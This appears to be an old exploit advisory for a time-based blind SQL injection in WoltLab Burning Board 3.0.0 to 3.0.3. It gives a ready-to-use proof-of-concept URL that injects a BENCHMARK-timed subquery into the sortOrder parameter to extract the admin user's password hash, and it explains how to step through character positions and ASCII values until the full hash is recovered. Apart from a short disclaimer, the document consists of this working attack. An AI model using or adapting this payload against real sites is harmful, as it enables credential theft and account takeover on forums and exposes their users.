##############################################################################################
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
##############################################################################################
::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,
(SELECT password FROM wcf1_user WHERE userID=1 AND
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))
An attacker should have to register at the board to use this.
You can ask TRUE/FALSE questions to the database. Modify 3000000 if the stuff
doesn't work. On some MySQL Versions you need to edit this query
::Explain:
β¦AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))
1,1 is the position in the crypted password. 55 is the char in the
ascii-table.
In this example we ask for number 7 in the hash, position 1. If the page load
fast, you find a true char. If not, ask other chars ;-).If you enter a char
that is higher then the true's, the page load fast to, so start from 48 first
and go higher.
::Vulnerabiltiy
As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so
I don't test it, because there is no reason and I am not a cracker ;-)
WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX
WoltLab Burning Board 3.0.1 PLX
WoltLab Burning Board 3.0.0 PLX
Possible WoltLab Burning Board 3.0.4 (not tested)β¦
Please don't use this to crack forums. All what you do with this is at your
own risk.